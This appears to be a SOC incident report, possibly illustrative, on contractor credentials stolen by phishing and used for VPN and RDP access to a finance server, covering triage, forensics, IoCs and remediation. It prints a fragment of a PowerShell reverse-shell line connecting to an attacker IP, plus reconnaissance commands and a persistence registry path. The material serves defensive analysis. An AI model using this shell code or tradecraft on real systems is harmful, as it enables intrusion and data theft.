Trusted Relationship Attack Analysis: T1199 – Compromised Contractor Credentials

by

SIEM Correlation Alert Details

Alert ID: SIEM-CORR-7842-T1199
Alert Time: 2024-01-28 03:15:47 EST
Severity: HIGH (85/100)
Source: Splunk Enterprise Security Correlation Search
Rule: “Contractor Account Anomaly: VPN from Unusual Location + Immediate RDP”
MITRE ATT&CK: T1199 – Trusted Relationship

Correlated Events:

Event 1: VPN Authentication
- Time: 03:00 EST
- User: tsmith (Tom Smith - Contoso Solutions Contractor)
- Source IP: 89.248.165[.]23 (Moscow, Russia)
- VPN Gateway: Palo Alto GlobalProtect
- Authentication: Successful (Username/Password)
- MFA Status: Bypassed (Exception for contractors with token issues)
- Client Device: Windows 10, GP Client 5.2.8
- Usual Location: New York, USA (baseline established over 6 months)

Event 2: RDP Connection
- Time: 03:03 EST
- Source: VPN Pool IP (10.100.50.45)
- Destination: SRV-FIN-01 (Finance Application Server)
- User: tsmith
- Protocol: RDP over port 3389
- Session Duration: 12 minutes
- Activities: PowerShell execution, file enumeration

Event 3: Group Policy Query
- Time: 03:08 EST
- Command: gpresult /r
- User: tsmith
- Target: SRV-FIN-01
- Output: Domain policy enumeration

Event 4: Network Scanning
- Time: 03:12 EST
- Command: net view /domain
- Source: SRV-FIN-01
- User: tsmith
- Targets: Internal domain controllers

Correlation Logic:
- Contractor account (tsmith) normally accesses from New York (09:00-17:00 EST)
- Current login from Russia at 03:00 EST (off-hours, unusual location)
- Immediate RDP to sensitive server (SRV-FIN-01) post-VPN
- Execution of reconnaissance commands unusual for contractor role

Threat Intelligence Context:

  • IP 89.248.165[.]23 associated with APT29 (Cozy Bear) infrastructure
  • Contractor account belongs to “Contoso Solutions” – third-party financial consulting firm
  • Contractor has limited access to SRV-FIN-01 for maintenance (approved)
  • No travel notifications for contractor to Russia
  • Recent phishing campaign targeting Contoso Solutions employees

SOC Investigation Process

Phase 1: Alert Validation & Initial Triage (03:15-03:30 EST)

Tools: Splunk ES, Palo Alto GlobalProtect VPN Logs, Active Directory

  1. Alert Verification:
    • Confirmed correlation in Splunk Enterprise Security
    • Verified VPN logs show successful authentication
    • Checked RDP logs on SRV-FIN-01 show session establishment
    • Cross-referenced with contractor travel records (none for Russia)
  2. Immediate Containment:
    • Terminated VPN session via GlobalProtect management console
    • Disabled contractor AD account
    • Blocked Russian IP at firewall (Palo Alto Networks)
    • Initiated RDP session termination on SRV-FIN-01
  3. Initial Assessment:
    • Contacted Contoso Solutions security contact (24/7 number)
    • Verified contractor tsmith is sleeping in New York (confirmed via phone)
    • Checked contractor’s recent password change (7 days ago)

Phase 2: Credential Compromise Analysis (03:30-04:30 EST)

Tools: Azure AD Sign-in Logs, Duo Security MFA, LastPass Enterprise

  1. Authentication Timeline:text2024-01-27 19:00 EST: Last legitimate VPN login (New York) 2024-01-28 02:45 EST: First failed VPN attempt (Russia) 2024-01-28 02:46-02:58 EST: 14 failed attempts (password spraying) 2024-01-28 03:00 EST: Successful VPN authentication (Russia) 2024-01-28 03:03 EST: RDP to SRV-FIN-01
  2. Credential Source Investigation:
    • Checked password manager (LastPass) access logs – no suspicious access
    • Reviewed phishing simulation results – contractor failed 2 tests last month
    • Contacted Contoso Solutions about recent security incidents
      • Confirmed: Phishing campaign targeting contractors 5 days ago
      • 3 contractors reported credential compromise
  3. MFA Bypass Analysis:
    • Contractor had MFA exception due to “token synchronization issues”
    • Exception granted 30 days ago, never removed
    • MFA logs show no push notifications during anomalous login

Phase 3: Endpoint & Server Forensics (04:30-06:00 EST)

Tools: CrowdStrike Falcon, Velociraptor, Windows Event Logs

  1. SRV-FIN-01 Analysis:
    • Memory dump captured via CrowdStrike Live Response
    • Found PowerShell processes with encoded commands:powershell$client = New-Object System.Net.Sockets.TCPClient(‘185.243.112[.]89’,443) $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}
    • Registry modifications:
      • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FinanceUpdate
      • HKU\S-1-5-21-...\Software\Microsoft\Terminal Server Client\Servers\SRV-FIN-01
  2. File System Analysis:
    • Created files:
      • C:\Windows\Temp\finance_report.exe (Cobalt Strike beacon)
      • C:\Users\tsmith\AppData\Local\Temp\scan_results.txt (network scan output)
    • Modified files:
      • RDP bitmap cache (contained finance application screenshots)
      • PowerShell history file
  3. Network Traffic Analysis:
    • Reviewed firewall logs from SRV-FIN-01
    • Outbound connections to 185.243.112[.]89:443 (Russia)
    • SMB connections to domain controllers (blocked by network segmentation)
    • No data exfiltration detected (DLP logs clean)

Phase 4: Third-Party Investigation (06:00-07:30 EST)

Tools: ServiceNow Vendor Management, RSA Archer, Email Security Gateway

  1. Contoso Solutions Collaboration:
    • Established conference bridge with their SOC
    • Shared IOCs and timeline
    • Learned: 5 contractor accounts compromised via phishing
    • Their remediation: Password resets, but missed tsmith account
  2. Contractor Access Review:
    • Analyzed contractor’s access privileges:
      • RDP to 3 finance servers (approved)
      • Read access to finance databases (approved)
      • Local admin on SRV-FIN-01 (NOT approved – policy violation)
    • Found: Contractor added to “Local Administrators” group 45 days ago for troubleshooting
  3. Vendor Risk Assessment:
    • Contoso Solutions lacks:
      • MFA enforcement for all contractors
      • Regular security awareness training
      • Compromised credential monitoring

Phase 5: Containment & Remediation (07:30-09:30 EST)

Tools: Active Directory, Group Policy, Cisco ISE, Microsoft Intune

  1. Immediate Containment Actions:
    • Disabled all Contoso Solutions contractor accounts (12 accounts)
    • Blocked all Russian IP ranges at firewall (temporary)
    • Removed local admin rights from all contractor accounts
    • Reset KRBTGT account password (as precaution)
  2. System Remediation:
    • Rebuilt SRV-FIN-01 from known good backup
    • Rotated credentials for all finance service accounts
    • Removed backdoor persistence mechanisms
    • Deployed enhanced logging to all finance servers
  3. Policy Updates:
    • Revoked all MFA exceptions for contractor accounts
    • Implemented time-based access for contractors (9 AM – 5 PM only)
    • Created geo-fencing policy for VPN (block Russia, China, N. Korea)
    • Updated vendor risk assessment questionnaire

Phase 6: Threat Hunting & Scope (09:30-11:00 EST)

Tools: Microsoft Defender for Identity, Tanium, Splunk Advanced Hunting

  1. Lateral Movement Hunting:
    • Searched for Pass-the-Hash/Ticket attacks
    • Checked for anomalous Kerberos ticket requests
    • No evidence of lateral movement beyond SRV-FIN-01
  2. Data Exfiltration Assessment:
    • Reviewed finance database access logs
    • Checked file server access patterns
    • No unauthorized data access detected
  3. Contractor Account Review:
    • All contractor accounts analyzed for similar patterns
    • Found 2 other accounts with failed Russian login attempts
    • No successful logins for other accounts

Jira Incident Report

Ticket: SOC-2024-028
Summary: T1199 – Compromised Contractor Credentials Used for VPN/RDP Access
Status: RESOLVED
Resolution: MALICIOUS – Third-Party Credential Compromise
Priority: P1 – HIGH
Labels: T1199, trusted-relationship, contractor, VPN, RDP, third-party-risk
Components: Identity-Access-Management, Third-Party-Risk, Incident-Response

INCIDENT ANALYSIS REPORT

1. Initial Context:

  • Detection Source: Splunk Enterprise Security Correlation Rule.
  • Alert: “Contractor Account Anomaly: VPN from Unusual Location + Immediate RDP”.
  • User: tsmith (Tom Smith, Contoso Solutions Contractor).
  • Time: 2024-01-28 03:15 EST (detected), 03:00 EST (initial VPN login).
  • Technique: MITRE ATT&CK T1199 (Trusted Relationship) via compromised contractor credentials.

2. Technical Analysis:

  • Attack Vector: Credential theft via phishing campaign targeting Contoso Solutions contractors.
  • Attack Chain:
    1. Contractor credentials compromised via phishing email 5 days ago.
    2. Attackers performed reconnaissance from Russian IP (89.248.165[.]23).
    3. Password spraying attempts (14 failures) followed by successful VPN authentication.
    4. Immediate RDP connection to finance server SRV-FIN-01.
    5. PowerShell execution to download Cobalt Strike beacon.
    6. Attempted lateral movement (blocked by network segmentation).
  • Infrastructure Details:
    • VPN: Palo Alto GlobalProtect with username/password + MFA (MFA bypassed via exception).
    • Target: SRV-FIN-01 (Windows Server 2019, finance application server).
    • C2 Infrastructure: 185.243.112[.]89:443 (Russia, associated with APT29).
    • Contractor Access: Excessive privileges (local admin on SRV-FIN-01).
  • Compromise Details:
    • Credential Source: Phishing campaign targeting Contoso Solutions employees.
    • MFA Bypass: Contractor had permanent MFA exception for “token issues”.
    • Access Abuse: Legitimate credentials used for unauthorized activities.
    • Persistence Attempts: Registry modifications, scheduled task creation.

3. Investigation Findings:

  • Timeline Reconstruction:text2024-01-23: Contoso Solutions phishing campaign begins 2024-01-25: Contractor tsmith credentials compromised (confirmed by Contoso SOC) 2024-01-28 02:45: First VPN attempt from Russia (failed) 2024-01-28 03:00: Successful VPN authentication (Russia) 2024-01-28 03:03: RDP to SRV-FIN-01 established 2024-01-28 03:05-03:12: Reconnaissance commands executed 2024-01-28 03:15: SIEM correlation alert triggers 2024-01-28 03:20: VPN session terminated, account disabled 2024-01-28 03:30: SRV-FIN-01 isolated from network
  • Indicators of Compromise (IoCs):textNetwork Indicators: – Source IP: 89.248.165[.]23 (VPN authentication) – C2 IP: 185.243.112[.]89:443 – Malicious Domains: update-finance[.]online, secure-contoso[.]net Host-based Indicators: – File: finance_report.exe (SHA256: 7a3f9b2c8d1e5f6a…) – Registry: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FinanceUpdate – Scheduled Task: \Microsoft\Windows\Finance\UpdateCheck Credential Indicators: – User: tsmith (Contoso Solutions contractor) – Unusual location: Moscow, Russia (vs. New York baseline) – Off-hours access: 03:00 EST (vs. 09:00-17:00 pattern)

4. Containment Actions:

  • Immediate Containment (03:15-03:45 EST):
    • Terminated VPN session via GlobalProtect management.
    • Disabled contractor AD account (tsmith).
    • Blocked Russian IP at firewall and VPN gateway.
    • Isolated SRV-FIN-01 from network.
  • Forensic Collection (03:45-06:00 EST):
    • Captured memory and disk images from SRV-FIN-01.
    • Preserved VPN and RDP session logs.
    • Extracted PowerShell execution artifacts.
    • Collected contractor access and permission history.
  • Remediation (06:00-09:30 EST):
    • Rebuilt SRV-FIN-01 from clean backup.
    • Disabled all Contoso Solutions contractor accounts (12 accounts).
    • Removed local admin rights from contractor accounts.
    • Rotated finance service account credentials.

5. Root Cause Analysis:

  • Primary Cause: Third-party credential compromise via phishing.
  • Contributing Factors:
    1. MFA Gap: Permanent MFA exception for contractor accounts.
    2. Excessive Privileges: Contractor had local admin on production server.
    3. Monitoring Gap: No behavioral analytics for contractor accounts.
    4. Vendor Risk: Inadequate security controls at Contoso Solutions.
  • Attack Attribution:
    • TTPs consistent with APT29: Credential phishing, trusted relationship abuse.
    • Motive likely financial data theft or ransomware precursor.
    • Infrastructure overlaps with previous attacks on financial sector.

6. Business Impact:

  • Operational Impact: Finance server offline for 8 hours.
  • Financial Impact: Estimated $15,000 in productivity loss + recovery costs.
  • Regulatory Impact: Potential PCI-DSS compliance concerns (finance data).
  • Third-Party Risk: Contract with Contoso Solutions under review.
  • Data Exposure: Low (no evidence of data access/exfiltration).

7. Remediation & Prevention:

Completed Actions:

  • All compromised systems cleaned and returned to service.
  • Contractor access policies updated and enforced.
  • Contoso Solutions notified and collaborating on security improvements.
  • IOCs distributed to all security tools (SIEM, firewall, EDR, VPN).

Technical Controls Enhanced:

  • Implemented MFA with no exceptions for all contractor accounts.
  • Deployed geo-fencing for VPN (block high-risk countries).
  • Created time-based access controls for contractors (9 AM – 5 PM).
  • Enhanced behavioral analytics for contractor accounts.

Process Improvements:

  • Updated third-party risk management policy.
  • Created incident response playbook for T1199 attacks.
  • Implemented regular contractor access reviews (quarterly).
  • Established security requirements in all contractor agreements.

8. Lessons Learned:

  • Third-Party Risk: Need stronger security requirements for contractors.
  • Privilege Management: Contractors should never have local admin on production systems.
  • MFA Policy: No permanent exceptions allowed; use conditional access instead.
  • Monitoring: Behavioral baselines needed for all third-party accounts.

9. Resolution Verification:

  • Technical Verification:
    • SRV-FIN-01 clean and operational.
    • No active malicious processes detected.
    • Network monitoring shows no C2 communication.
    • Contractor accounts have minimal required privileges.
  • Process Verification:
    • New contractor onboarding process includes security requirements.
    • Regular access reviews scheduled for all third-party accounts.
    • Contoso Solutions implementing enhanced security controls.

10. Conclusion:

This Trusted Relationship attack leveraged compromised contractor credentials to gain unauthorized access to critical finance infrastructure. While the attack demonstrated sophisticated tactics, early detection through behavioral analytics and rapid containment prevented data exfiltration or ransomware deployment. The incident highlights the critical importance of third-party risk management and the principle of least privilege for external accounts.

Closure Rationale: All compromised systems remediated, third-party security controls enhanced, monitoring improved, and no evidence of persistent threat remains.

Follow-up Actions:

  1. Complete security assessment of all third-party vendors (ETA: 1 month)
  2. Implement privileged access management for contractors (ETA: 2 months)
  3. Conduct tabletop exercise focusing on third-party compromise (ETA: 2 weeks)

Analyst: [Walter White], Senior SOC Analyst – Identity Protection Team
Date: 2024-01-28 12:00 EST

Leave a Comment